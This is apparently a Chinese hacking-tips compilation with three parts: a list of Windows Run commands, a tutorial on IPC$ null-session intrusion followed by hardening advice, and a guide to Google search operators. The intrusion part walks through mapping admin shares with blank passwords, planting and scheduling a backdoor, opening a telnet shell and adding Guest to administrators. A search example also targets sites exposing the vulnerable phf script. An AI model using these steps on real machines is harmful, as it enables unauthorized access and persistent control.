    drwtsn32------ 系統(tǒng)醫(yī)生
    devmgmt.msc--- 設(shè)備管理器
    dfrg.msc-------磁盤碎片整理程序
    diskmgmt.msc---磁盤管理實用程序
    dcomcnfg-------打開系統(tǒng)組件服務(wù)
    ddeshare-------打開DDE共享設(shè)置
    dvdplay--------DVD播放器

    net stop messenger-----停止信使服務(wù)
    net start messenger----開始信使服務(wù)
    notepad--------打開記事本
    nslookup-------網(wǎng)絡(luò)管理的工具向?qū)?
    ntbackup-------系統(tǒng)備份和還原
    narrator-------屏幕“講述人”
    ntmsmgr.msc----移動存儲管理器
    ntmsoprq.msc---移動存儲管理員操作請求
    netstat -an----(TC)命令檢查接口

    syncapp--------創(chuàng)建一個公文包
    sysedit--------系統(tǒng)配置編輯器
    sigverif-------文件簽名驗證程序
    sndrec32-------錄音機
    shrpubw--------創(chuàng)建共享文件夾
    secpol.msc-----本地安全策略
    syskey---------系統(tǒng)加密,一旦加密就不能解開,保護windows xp系統(tǒng)的雙重密碼
    services.msc---本地服務(wù)設(shè)置
    Sndvol32-------音量控制程序
    sfc.exe--------系統(tǒng)文件檢查器
    sfc /scannow---windows文件保護

    tsshutdn-------60秒倒計時關(guān)機命令
    tourstart------xp簡介(安裝完成后出現(xiàn)的漫游xp程序)
    taskmgr--------任務(wù)管理器

    eventvwr-------事件查看器
    eudcedit-------造字程序
    explorer-------打開資源管理器


    packager-------對象包裝程序
    perfmon.msc----計算機性能監(jiān)測程序
    progman--------程序管理器

    regedit.exe----注冊表
    rsop.msc-------組策略結(jié)果集
    regedt32-------注冊表編輯器
    rononce -p ----15秒關(guān)機
    regsvr32 /u *.dll----停止dll文件運行
    regsvr32 /u zipfldr.dll------取消ZIP支持

    cmd.exe--------CMD命令提示符
    chkdsk.exe-----Chkdsk磁盤檢查
    certmgr.msc----證書管理實用程序
    calc-----------啟動計算器
    charmap--------啟動字符映射表
    cliconfg-------SQL SERVER 客戶端網(wǎng)絡(luò)實用程序
    Clipbrd--------剪貼板查看器
    conf-----------啟動netmeeting
    compmgmt.msc---計算機管理
    cleanmgr-------整理
    ciadv.msc------索引服務(wù)程序

    osk------------打開屏幕鍵盤
    odbcad32-------ODBC數(shù)據(jù)源管理器
    oobe/msoobe /a----檢查XP是否激活
    lusrmgr.msc----本機用戶和組
    logoff---------注銷命令

    iexpress-------自帶的壓縮包的制作軟件
    IEXPRESS 是 Windows 中自帶的 CAB 格式壓縮包的制作軟件,從 Windows 2000就有了,但是它一直都藏
    在 Windows 的系統(tǒng),在微軟的許多產(chǎn)品介紹中似乎也看不見它的蹤跡,IEXPRESS 不僅支持 CAB 文件的打包
    制作并且支持高級 INF 格式安裝

    Nslookup-------IP地址偵測器

    fsmgmt.msc-----共享文件夾管理器

    utilman--------輔助工具管理器

    gpedit.msc-----組策略

    第四部分
    IPC$空連接的入侵和防御詳解

    相關(guān)命令
      建立空連接
        net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)
      建立非空連接
        net use \\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個空格)
      映射默認(rèn)共享
        net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)
      如果已經(jīng)和目標(biāo)建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$
      刪除一個ipc$連接
        net use \\IP\ipc$ /del
      刪除共享映射
        net use c: /del 刪除映射的c盤,其他盤類推
        net use * /del 刪除全部,會有提示要求按y確認(rèn)
    經(jīng)典入侵模式
      1.C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
      這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,后面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
      2. C:\>copy srv.exe \\127.0.0.1\admin$
      先復(fù)制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復(fù)制到什么地方去了)。
      3.C:\>net time \\127.0.0.1
      查查時間,發(fā)現(xiàn)127.0.0.1 的當(dāng)前時間是 2002/3/19 上午 11:00,命令成功完成。
      4.C:\>at \\127.0.0.1 11:05 srv.exe
      用at命令啟動srv.exe吧(這里設(shè)置的時間要比主機時間快,不然你怎么啟動啊,呵呵!)
      5.C:\>net time \\127.0.0.1
      再查查到時間沒有?如果127.0.0.1 的當(dāng)前時間是 2002/3/19 上午 11:05,那就準(zhǔn)備開始下面的命令。
      6.C:\>telnet 127.0.0.1 99
      這里會用到Telnet命令吧,注意端口是99。Telnet默認(rèn)的是23端口,但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell。
      雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務(wù)!這就要用到ntlm了
      7.C:\>copy ntlm.exe \\127.0.0.1\admin$
      用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
      8.C:\WINNT\system32>ntlm
      輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當(dāng)出現(xiàn)"DONE"的時候,就說明已經(jīng)啟動正常。然后使用"net start telnet"來開啟Telnet服務(wù)!
      9.Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然后你想做什么?想做什么就做什么吧,哈哈)
      為了以防萬一,我們再把guest激活加到管理組
      10.C:\>net user guest /active:yes
      將對方的Guest用戶激活
      11.C:\>net user guest 1234
      將Guest的密碼改為1234,或者你要設(shè)定的密碼
      12.C:\>net localgroup administrators guest /add
      將Guest變?yōu)锳dministrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這臺計算機)
    ipc$與空連接,139,445端口,默認(rèn)共享的關(guān)系
      以上四者的關(guān)系可能是菜鳥很困惑的一個問題,不過大部分文章都沒有進行特別的說明,其實我理解的也不是很透徹,都是在與大家交流中總結(jié)出來的.(一個有良好討論氛圍的BBS可以說是菜鳥的天堂)
      ipc$與空連接
      不需要用戶名與密碼的ipc$連接即為空連接,一旦你以某個用戶或管理員的身份登陸(即以特定的用戶名和密碼進行ipc$連接),自然就不能叫做空連接了.
      許多人可能要問了,既然可以空連接,那我以后就空連接好了,為什么還要費九牛二虎之力去掃描弱口令,呵呵,原因前面提到過,當(dāng)你以空連接登陸時,你沒有任何權(quán)限(很郁悶吧),而你以用戶或管理員的身份登陸時,你就會有相應(yīng)的權(quán)限(有權(quán)限誰不想呀,所以還是老老實實掃吧,不要偷懶喲).
      ipc$與139,445端口
      ipc$連接可以實現(xiàn)遠(yuǎn)程登陸及對默認(rèn)共享的訪問;而139端口的開啟表示netbios協(xié)議的應(yīng)用,我們可以通過139,445(win2000)端口實現(xiàn)對共享文件/打印機的訪問,因此一般來講,ipc$連接是需要139或445端口來支持的.
      ipc$與默認(rèn)共享
      默認(rèn)共享是為了方便管理員遠(yuǎn)程管理而默認(rèn)開啟的共享(你當(dāng)然可以關(guān)閉它),即所有的邏輯盤(c$,d$,e$……)和系統(tǒng)目錄winnt或windows(admin$),我們通過ipc$連接可以實現(xiàn)對這些默認(rèn)共享的訪問(前提是對方?jīng)]有關(guān)閉這些默認(rèn)共享)
      ipc$連接失敗的原因
      以下5個原因是比較常見的:
      1)你的系統(tǒng)不是NT或以上操作系統(tǒng);
      2)對方?jīng)]有打開ipc$默認(rèn)共享
      3)對方未開啟139或445端口(惑被防火墻屏蔽)
      4)你的命令輸入有誤(比如缺少了空格等)
      5)用戶名或密碼錯誤(空連接當(dāng)然無所謂了)
      另外,你也可以根據(jù)返回的錯誤號分析原因:
      錯誤號5,拒絕訪問 : 很可能你使用的用戶不是管理員權(quán)限的,先提升權(quán)限;
      錯誤號51,Windows 無法找到網(wǎng)絡(luò)路徑 : 網(wǎng)絡(luò)有問題;
      錯誤號53,找不到網(wǎng)絡(luò)路徑 : ip地址錯誤;目標(biāo)未開機;目標(biāo)lanmanserver服務(wù)未啟動;目標(biāo)有防火墻(端口過濾);
      錯誤號67,找不到網(wǎng)絡(luò)名 : 你的lanmanworkstation服務(wù)未啟動;目標(biāo)刪除了ipc$;
      錯誤號1219,提供的憑據(jù)與已存在的憑據(jù)集沖突 : 你已經(jīng)和對方建立了一個ipc$,請刪除再連。
      錯誤號1326,未知的用戶名或錯誤密碼 : 原因很明顯了;
      錯誤號1792,試圖登錄,但是網(wǎng)絡(luò)登錄服務(wù)沒有啟動 : 目標(biāo)NetLogon服務(wù)未啟動。(連接域控會出現(xiàn)此情況)
      錯誤號2242,此用戶的密碼已經(jīng)過期 : 目標(biāo)有帳號策略,強制定期要求更改密碼。
      關(guān)于ipc$連不上的問題比較復(fù)雜,除了以上的原因,還會有其他一些不確定因素,在此本人無法詳細(xì)而確定的說明,就靠大家自己體會和試驗了.
      如何打開目標(biāo)的IPC$
      首先你需要獲得一個不依賴于ipc$的shell,比如sql的cmd擴展、telnet、木馬,當(dāng)然,這shell必須是admin權(quán)限的,然后你可以使用shell執(zhí)行命令 net share ipc$ 來開放目標(biāo)的ipc$。從上面可以知道,ipc$能否使用還有很多條件。請確認(rèn)相關(guān)服務(wù)都已運行,沒有就啟動它(不知道怎么做的請看net命令的用法),還是不行的話(比如有防火墻,殺不了)建議放棄。
      如何防范ipc$入侵
      禁止空連接進行枚舉(此操作并不能阻止空連接的建立,引自《解剖win2000下的空會話》)
      首先運行regedit,找到如下組建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為:00000001(如果設(shè)置為2的話,有一些問題會發(fā)生,比如一些WIN的服務(wù)出現(xiàn)問題等等)
      禁止默認(rèn)共享1)察看本地共享資源運行-cmd-輸入net share
      2)刪除共享(每次輸入一個)
        net share ipc$ /delete
        net share admin$ /delete
        net share c$ /delete
        net share d$ /delete(如果有e,f,……可以繼續(xù)刪除)
      3)停止server服務(wù)
        net stop server /y (重新啟動后server服務(wù)會重新開啟)
      4)修改注冊表
      運行-regedit
      server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的鍵值改為:00000000。
      pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的鍵值改為:00000000。
      如果上面所說的主鍵不存在,就新建(右擊-新建-雙字節(jié)值)一個主健再改鍵值。
      永久關(guān)閉ipc$和默認(rèn)共享依賴的服務(wù):lanmanserver即server服務(wù)
      控制面板-管理工具-服務(wù)-找到server服務(wù)(右擊)-屬性-常規(guī)-啟動類型-已禁用
      安裝防火墻(選中相關(guān)設(shè)置),或者端口過濾(濾掉139,445等),或者用新版本的優(yōu)化大師
      設(shè)置復(fù)雜密碼,防止通過ipc$窮舉密碼

    問:

    請問下~IPC空連接~有什么用啊?請問下~IPC空連接~有什么用啊?
    這么才可以取得更高的權(quán)利呢??

    答:首先需要指出的是空連接和ipc$是不同的概念。空連接是在沒有信任的情況下與服務(wù)器建立的會話,換句話說,它是一個到服務(wù)器的匿名訪問。ipc$是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應(yīng)的權(quán)限。有許多的工具必須用到ipc$。默認(rèn)共享是為了方便遠(yuǎn)程管理而開放的共享,包含了所有的邏輯盤(c$,d$,e$……)和系統(tǒng)目錄winnt或windows(admin$)。
    IPC$(Internet Process Connection)是共享"命名管道"的資源,它是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應(yīng)的權(quán)限,在遠(yuǎn)程管理計算機和查看計算機的共享資源時使用。利用IPC$,連接者甚至可以與目標(biāo)主機建立一個空的連接而無需用戶名與密碼(當(dāng)然,對方機器必須開了ipc$共享,否則你是連接不上的),而利用這個空的連接,連接者還可以得到目標(biāo)主機上的用戶列表(不過負(fù)責(zé)的管理員會禁止導(dǎo)出用戶列表的)。我們總在說ipc$漏洞ipc$漏洞,其實,ipc$并不是真正意義上的漏洞,它是為了方便管理員的遠(yuǎn)程管理而開放的遠(yuǎn)程網(wǎng)絡(luò)登陸功能,而且還打開了默認(rèn)共享,即所有的邏輯盤(c$,d$,e$……)和系統(tǒng)目錄winnt或windows(admin$)。所有的這些,初衷都是為了方便管理員的管理,但好的初衷并不一定有好的收效,一些別有用心者(到底是什么用心?我也不知道,代詞一個)會利用IPC$,訪問共享資源,導(dǎo)出用戶列表,并使用一些字典工具,進行密碼探測,寄希望于獲得更高的權(quán)限,從而達到不可告人的目的.
      解惑:
      1)IPC連接是Windows NT及以上系統(tǒng)中特有的遠(yuǎn)程網(wǎng)絡(luò)登陸功能,其功能相當(dāng)于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函數(shù),所以不能在Windows 9.x中運行。也就是說只有nt/2000/xp才可以建立ipc$連接,98/me是不能建立ipc$連接的(但有些朋友說在98下能建立空的連接,不知道是真是假,不過現(xiàn)在都2003年了,建議98的同志換一下系統(tǒng)吧,98不爽的)
      2)即使是空連接也不是100%都能建立成功,如果對方關(guān)閉了ipc$共享,你仍然無法建立連接
      3)并不是說建立了ipc$連接就可以查看對方的用戶列表,因為管理員可以禁止導(dǎo)出用戶列表
      建立ipc$連接在hack攻擊中的作用
      就像上面所說的,即使你建立了一個空的連接,你也可以獲得不少的信息(而這些信息往往是入侵中必不可少的),訪問部分共享,如果你能夠以某一個具有一定權(quán)限的用戶身份登陸的話,那么你就會得到相應(yīng)的權(quán)限,顯然,如果你以管理員身份登陸,嘿嘿,就不用我在多說了吧,what u want,u can do!!
      (基本上可以總結(jié)為獲取目標(biāo)信息、管理目標(biāo)進程和服務(wù),上傳木馬并運行,如果是2000server,還可以考慮開啟終端服務(wù)方便控制.怎么樣?夠厲害吧!)
      不過你也不要高興的太早,因為管理員的密碼不是那么好搞到的,雖然會有一些傻傻的管理員用空口令或者弱智密碼,但這畢竟是少數(shù),而且現(xiàn)在不比從前了,隨著人們安全意識的提高,管理員們也愈加小心了,得到管理員密碼會越來越難的:(
      因此今后你最大的可能就是以極小的權(quán)限甚至是沒有權(quán)限進行連接,你會慢慢的發(fā)現(xiàn)ipc$連接并不是萬能的,甚至在主機不開啟ipc$共享時,你根本就無法連接.
      所以我認(rèn)為,你不要把ipc$入侵當(dāng)作終極武器,不要認(rèn)為它戰(zhàn)無不勝,它就像是足球場上射門前的傳球,很少會有致命一擊的效果,但卻是不可缺少的,我覺得這才是ipc$連接在hack入侵中的意義所在.

    第五部分
    GOOGLE搜索秘籍

    一,GOOGLE簡介

    Google(www.google.com)是一個搜索引擎,由兩個斯坦福大學(xué)博士生Larry Page與Sergey Brin于1998年9月發(fā)明,Google Inc. 于1999年創(chuàng)立。2000年7月份,Google替代Inktomi成為Yahoo公司的搜索引擎,同年9月份,Google成為中國網(wǎng)易公司的搜索引擎。98年至今,GOOGLE已經(jīng)獲得30多項業(yè)界大獎。

    二,GOOGLE特色

    GOOGLE支持多達132種語言,包括簡體中文和繁體中文;
    GOOGLE網(wǎng)站只提供搜索引擎功能,沒有花里胡哨的累贅;
    GOOGLE速度極快,據(jù)說有8000多臺服務(wù)器,200多條T3級寬帶;

    GOOGLE的專利網(wǎng)頁級別技術(shù)PageRank能夠提供高命中率的搜索結(jié)果;
    GOOGLE的搜索結(jié)果摘錄查詢網(wǎng)頁的部分具體內(nèi)容,而不僅僅是網(wǎng)站簡介;
    GOOGLE智能化的“手氣不錯”功能,提供可能最符合要求的網(wǎng)站;
    GOOGLE的“網(wǎng)頁快照”功能,能從GOOGLE服務(wù)器里直接取出緩存的網(wǎng)頁。

    三,基本搜索:+,-,OR

    GOOGLE無需用明文的“+”來表示邏輯“與”操作,只要空格就可以了。

    示例:搜索所有包含關(guān)鍵詞“易筋經(jīng)”和“吸星大法”的中文網(wǎng)頁
    搜索:“易筋經(jīng) 吸星大法”
    結(jié)果:已搜索有關(guān)易筋經(jīng) 吸星大法的中文(簡體)網(wǎng)頁。共約有726項查詢結(jié)果,這是第1-10項。搜索用時0.13秒。

    注意:文章中搜索語法外面的引號僅起引用作用,不能帶入搜索欄內(nèi)。

    GOOGLE用減號“-”表示邏輯“非”操作。

    示例:搜索所有包含“易筋經(jīng)”而不含“吸星大法”的中文網(wǎng)頁
    搜索:“易筋經(jīng) -吸星大法”
    結(jié)果:已搜索有關(guān)易筋經(jīng) -吸星大法的中文(簡體)網(wǎng)頁。共約有5,440項查詢結(jié)果,這是第1-10項。搜索用時0.13秒。

    注意:這里的“+”和“-”號,是英文字符,而不是中文字符的“+”和“-”。此外,操作符與作用的關(guān)鍵字之間,不能有空格。比如“易筋經(jīng) - 吸星大法”,搜索引擎將視為邏輯“與”操作,中間的“-”被忽略。

    GOOGLE用大寫的“OR”表示邏輯“或”操作。但是,關(guān)鍵字為中文的或查詢似乎還有BUG,無法得到正確的查詢結(jié)果。

    示例:搜索包含布蘭妮“Britney”或者披頭士“Beatles”、或者兩者均有的中文網(wǎng)頁。
    搜索:“britney OR beatles”
    結(jié)果:已搜索有關(guān)britney OR beatles的中文(簡體)網(wǎng)頁。共約有14,600項查詢結(jié)果,這是第1-10項。搜索用時0.08秒。
    搜索:“布蘭妮 OR 披頭士”
    結(jié)果:找不到和您的查詢-布蘭妮 OR 披頭士-相符的網(wǎng)頁。

    注意:小寫的“or”,在查詢的時候?qū)⒈缓雎裕贿@樣上述的操作實際上變成了一次“與”查詢。

    “+”和“-”的作用有的時候是相同的,都是為了縮小搜索結(jié)果的范圍,提高查詢結(jié)果命中率。

    例:查閱天龍八部具體是哪八部。

    分析:如果光用“天龍八部”做關(guān)鍵字,搜索結(jié)果有26,500項,而且排前列的主要與金庸的小說《天龍八部》相關(guān),很難找到所需要的資訊。可以用兩個方法減少無關(guān)結(jié)果。

    1,如果你知道八部中的某一部,比如阿修羅,增加“阿修羅”關(guān)鍵字,搜索結(jié)果就只有995項,可以直接找到全部八部,“天龍八部 阿修羅”。

    2,如果你不知道八部中的任何一部,但知道這與佛教相關(guān),可以排除與金庸小說相關(guān)的記錄,查詢結(jié)果為1,010項,可以迅速找到需要的資料,“天龍八部 佛教 -金庸”。

    四,輔助搜索:通配符、大小寫、句子、忽略字符以及強制搜索

    GOOGLE不支持通配符,如“*”、“?”等,只能做精確查詢,關(guān)鍵字后面的“*”或者“?”會被忽略掉。

    GOOGLE對英文字符大小寫不敏感,“GOD”和“god”搜索的結(jié)果是一樣的。

    GOOGLE的關(guān)鍵字可以是詞組(中間沒有空格),也可以是句子(中間有空格),但是,用句子做關(guān)鍵字,必須加英文引號。

    示例:搜索包含“long, long ago”字串的頁面。
    搜索:“"long, long ago"”
    結(jié)果:已向英特網(wǎng)搜索"long, long ago". 共約有28,300項查詢結(jié)果,這是第1-10項。搜索用時0.28秒。

    注意:和搜索英文關(guān)鍵字串不同的是,GOOGLE對中文字串的處理并不十分完善。比如,搜索“"啊,我的太陽"”,我們希望結(jié)果中含有這個句子,事實并非如此。查詢的很多結(jié)果,“啊”、“我的”、“太陽”等詞語是完全分開的,但又不是“啊 我的 太陽”這樣的與查詢。顯然,GOOGLE對中文的支持尚有欠缺之處。

    GOOGLE對一些網(wǎng)路上出現(xiàn)頻率極高的詞(主要是英文單詞),如“i”、“com”,以及一些符號如“*”、“.”等,作忽略處理,如果用戶必須要求關(guān)鍵字中包含這些常用詞,就要用強制語法“+”。

    示例:搜索包含“Who am I ?”的網(wǎng)頁。如果用“"who am i ?"”,“Who”、“I”、“?”會被省略掉,搜索將只用“am”作關(guān)鍵字,所以應(yīng)該用強制搜索。
    搜索:“"+who +am +i"”
    結(jié)果:已向英特網(wǎng)搜索"+who +am +i". 共約有362,000項查詢結(jié)果,這是第1-10項。搜索用時0.30秒。

    注意:英文符號(如問號,句號,逗號等)無法成為搜索關(guān)鍵字,加強制也不行。

    五,高級搜索:site,link,inurl,allinurl,intitle,allintitle

    “site”表示搜索結(jié)果局限于某個具體網(wǎng)站或者網(wǎng)站頻道,如“sina.com.cn”、“edu.sina.com.cn”,或者是某個域名,如“com.cn”、“com”等等。如果是要排除某網(wǎng)站或者域名范圍內(nèi)的頁面,只需用“-網(wǎng)站/域名”。

    示例:搜索中文教育科研網(wǎng)站(edu.cn)上所有包含“金庸”的頁面。
    搜索:“金庸 site:edu.cn”
    結(jié)果:已搜索有關(guān)金庸 site:edu.cn的中文(簡體)網(wǎng)頁。共約有2,680項查詢結(jié)果,這是第1-10項 。搜索用時0.31秒。

    示例:搜索包含“金庸”和“古龍”的中文新浪網(wǎng)站頁面,
    搜索:“金庸 古龍 site:sina.com.cn”
    結(jié)果:已在sina.com.cn搜索有關(guān)金庸 古龍的中文(簡體)網(wǎng)頁。共約有869項查詢結(jié)果,這是第1-10項。搜索用時0.34秒。

    注意:site后的冒號為英文字符,而且,冒號后不能有空格,否則,“site:”將被作為一個搜索的關(guān)鍵字。此外,網(wǎng)站域名不能有“http”以及“www”前綴,也不能有任何“/”的目錄后綴;網(wǎng)站頻道則只局限于“頻道名.域名”方式,而不能是“域名/頻道名”方式。諸如“金庸 site:edu.sina.com.cn/1/”的語法是錯誤的。

    “link”語法返回所有鏈接到某個URL地址的網(wǎng)頁。

    示例:搜索所有含指向華軍軟件園“www.newhua.com”鏈接的網(wǎng)頁。
    搜索:“link:www.newhua.com
    結(jié)果:搜索有鏈接到www.newhua.com的網(wǎng)頁。共約有695項查詢結(jié)果,這是第1-10項。搜索用時0.23秒。

    注意:“link”不能與其他語法相混合操作,所以“link:”后面即使有空格,也將被GOOGLE忽略。

    inurl語法返回的網(wǎng)頁鏈接中包含第一個關(guān)鍵字,后面的關(guān)鍵字則出現(xiàn)在鏈接中或者網(wǎng)頁文檔中。有很多網(wǎng)站把某一類具有相同屬性的資源名稱顯示在目錄名稱或者網(wǎng)頁名稱中,比如“MP3”、“GALLARY”等,于是,就可以用INURL語法找到這些相關(guān)資源鏈接,然后,用第二個關(guān)鍵詞確定是否有某項具體資料。INURL語法和基本搜索語法的最大區(qū)別在于,前者通常能提供非常精確的專題資料。

    示例:查找MIDI曲“滄海一聲笑”。
    搜索:“inurl:midi 滄海一聲笑”
    結(jié)果:已搜索有關(guān)inurl:midi 滄海一聲笑的中文(簡體)網(wǎng)頁。共約有14項查詢結(jié)果,這是第1-10項。搜索用時0.01秒。

    示例:查找微軟網(wǎng)站上關(guān)于windows2000的安全課題資料。
    搜索:“inurl:security windows2000 site:microsoft.com”
    結(jié)果:已在microsoft.com內(nèi)搜索有關(guān) inurl:security windows2000的網(wǎng)頁。共約有198項查詢結(jié)果,這是第1-10項。搜索用時0.37秒。

    注意:“inurl:”后面不能有空格,GOOGLE也不對URL符號如“/”進行搜索。GOOGLE對“cgi-bin/phf”中的“/”當(dāng)成空格處理。

    allinurl語法返回的網(wǎng)頁的鏈接中包含所有查詢關(guān)鍵字。這個查詢的對象只集中于網(wǎng)頁的鏈接字符串。

    示例:查找可能具有PHF安全漏洞的公司網(wǎng)站。通常這些網(wǎng)站的CGI-BIN目錄中含有PHF腳本程序(這個腳本是不安全的),表現(xiàn)在鏈接中就是“域名/cgi-bin/phf”。
    語法:“allinurl:"cgi-bin" phf +com”
    搜索:已向英特網(wǎng)搜索allinurl:"cgi-bin" phf +com. 共約有40項查詢結(jié)果,這是第1-10項。搜索用時0.06秒。

    allintitle和intitle的用法類似于上面的allinurl和inurl,只是后者對URL進行查詢,而前者對網(wǎng)頁的標(biāo)題欄進行查詢。網(wǎng)頁標(biāo)題,就是HTML標(biāo)記語言title中之間的部分。網(wǎng)頁設(shè)計的一個原則就是要把主頁的關(guān)鍵內(nèi)容用簡潔的語言表示在網(wǎng)頁標(biāo)題中。因此,只查詢標(biāo)題欄,通常也可以找到高相關(guān)率的專題頁面。

    示例:查找日本明星藤原紀(jì)香的照片集。
    搜索:“intitle:藤原紀(jì)香 寫真”
    結(jié)果:已搜索有關(guān)intitle:藤原紀(jì)香 寫真的中文(簡體)網(wǎng)頁。共約有284項查詢結(jié)果,這是第1-10項。搜索用時0.03秒。

    GOOGLE的罕用高級搜索語法:related,cache,info

    related用來搜索結(jié)構(gòu)內(nèi)容方面相似的網(wǎng)頁。例:搜索所有與中文新浪網(wǎng)主頁相似的頁面(如網(wǎng)易首頁,搜狐首頁,中華網(wǎng)首頁等),“related:www.sina.com.cn/index.shtml”。

    cache用來搜索GOOGLE服務(wù)器上某頁面的緩存,這個功能同“網(wǎng)頁快照”,通常用于查找某些已經(jīng)被刪除的死鏈接網(wǎng)頁,相當(dāng)于使用普通搜索結(jié)果頁面中的“網(wǎng)頁快照”功能。

    info用來顯示與某鏈接相關(guān)的一系列搜索,提供cache、link、related和完全包含該鏈接的網(wǎng)頁的功能。

    示例:查找和新浪首頁相關(guān)的一些資訊。
    搜索:“info:www.sina.com.cn
    結(jié)果:有關(guān)www.sina.com.cn的網(wǎng)頁信息。
    新浪首頁
    北京站 上海站 廣東站. ... 游戲世界, |, 影音娛樂, |, Club緣, |, 男
    人女人, |, 論壇聊天, |, 時尚潮流, |, 文教育兒, |, 車行天下, |,
    軟件下載. ...
    Google 提供這個網(wǎng)址的信息:
    查看Google網(wǎng)頁快照里www.sina.com.cn的存檔
    尋找和www.sina.com.cn類似的網(wǎng)頁
    尋找網(wǎng)頁有鏈接到www.sina.com.cn
    尋找網(wǎng)頁包含有'www.sina.com.cn'

    六,其他重要功能

    目錄服務(wù)

    如果不想搜索網(wǎng)頁,而是想尋找某些專題網(wǎng)站,可以訪問GOOGLE的分類目錄“http://directory.google.com/”,中文目錄是“http://directory.google.com/Top/World/Chinese_Simplified/”。不過由于GOOGLE的目錄由志愿者服務(wù),而GOOGLE在國內(nèi)名氣相對比較小,因此中文目錄下收錄站點很少。

    工具條

    為了方便搜索者,GOOGLE提供了工具條,集成于瀏覽器中,用戶無需打開GOOGLE主頁就可以在工具條內(nèi)輸入關(guān)鍵字進行搜索。此外,工具條還提供了其他許多功能,如顯示頁面PageRank等。最方便的一點在于用戶可以快捷的在GOOGLE主頁、目錄服務(wù)、新聞組搜索、高級搜索和搜索設(shè)定之間切換。欲安裝GOOGLE的工具條,可以訪問“http://toolbar.google.com/”,按頁面提示可以自動下載并安裝。

    新聞組(USENET)搜索

    新聞組中有大量的有價值信息,DEJA一直是新聞組搜索引擎中的佼佼者。2001年2月份,GOOGLE將DEJA收購并提供了所有DEJA的功能。現(xiàn)在,除了搜索之外,GOOGLE還支持新聞組的WEB方式瀏覽和張貼功能。

    輸入“http://groups.google.com/”后,便進入GOOGLE新聞組界面。可惜現(xiàn)在還沒有中文界面。因為新聞組中的帖子實在是多,所以我點擊“Advaced Groups Search”進入高級搜索界面http://groups.google.com/advanced_group_search。新聞組高級搜索界面提供對關(guān)鍵字、新聞組、主題、作者、帖子序號、語言和發(fā)布日期的條件搜索。其中作者項指作者發(fā)帖所用的唯一識別號電子信箱。比如要在alt.chinese.text內(nèi)搜索著名老牌網(wǎng)絡(luò)寫手圖雅的帖子,可以用下列指令“group:alt.chinese.text author:tuya@ccmail.uoregon.edu”。不過一般而言,我更推薦使用圖形搜索界面,方便而且直觀。

    搜索結(jié)果翻譯

    曾經(jīng)為那些你不懂的法文、西班牙文頁面煩惱么?現(xiàn)在,GOOGLE支持一項搜索結(jié)果翻譯功能,可以把非英文的搜索結(jié)果翻譯成英文!!雖然目前只支持有限的拉丁語、法語、西班牙語、德語和葡萄牙文,但是我不得不承認(rèn),這是個偉大的改進。

    不過,目前只能在英文狀態(tài)GOOGLE下實現(xiàn)這個功能。進入GOOGLE的設(shè)置頁面,http://www.google.com/preferences,有一個“BETA: Enable translation of search results into your interface language. ”的選項,把它選中,就OK了。

    搜索結(jié)果過濾

    網(wǎng)絡(luò)上的成人內(nèi)容浩如煙海,而且很多站點具有欺騙或者其他不良企圖,瀏覽者很容易掉入其中的陷阱。為此,GOOGLE新設(shè)立了成人內(nèi)容過濾功能,見GOOGLE的設(shè)置頁面,http://www.google.com/preferences,最底下有一個選項SafeSearch Filtering。不過,中文狀態(tài)下的GOOGLE尚沒有這個功能。

    PDF文檔搜索

    我對GOOGLE尤其欣賞的一點就是它提供對PDF文檔內(nèi)文的檢索。目前GOOGLE檢索的PDF文檔大約有2500萬左右。這真是太美妙了。PDF是ADOBE公司開發(fā)的電子文檔格式,現(xiàn)在已經(jīng)成為互聯(lián)網(wǎng)的電子化出版標(biāo)準(zhǔn)。PDF文檔通常是一些圖文并茂的綜合性文檔,提供的資訊一般比較集中全面。

    示例:搜索關(guān)于電子商務(wù)(ECOMMERCE)的PDF文檔。
    搜索:“inurl:pdf ecommerce”
    結(jié)果:已向英特網(wǎng)搜索inurl:pdf ecommerce. 共約有19,200項查詢結(jié)果,這是第1-10項。搜索用時0.11秒。

    下面是某項搜索結(jié)果:

    [PDF] www.usi.net/pdf/outsoucing-ecommerce.pdf
    Outsourcing Electronic Commerce Business Case White Paper By: John P. Sahlin, Product
    Marketing Professonial (PMP) Implementation Manager, Web Engineering ...
    一般文字檔 - 類似網(wǎng)頁

    可以看到,GOOGLE在PDF檔前加上了[PDF]的標(biāo)記,而且,GOOGLE把PDF文件轉(zhuǎn)換成了文字檔,點擊“一般文字檔”,可以粗略的查看該PDF文檔的大致內(nèi)容。當(dāng)然,PDF原有的圖片以及格式是沒有了。

    圖像文檔搜索

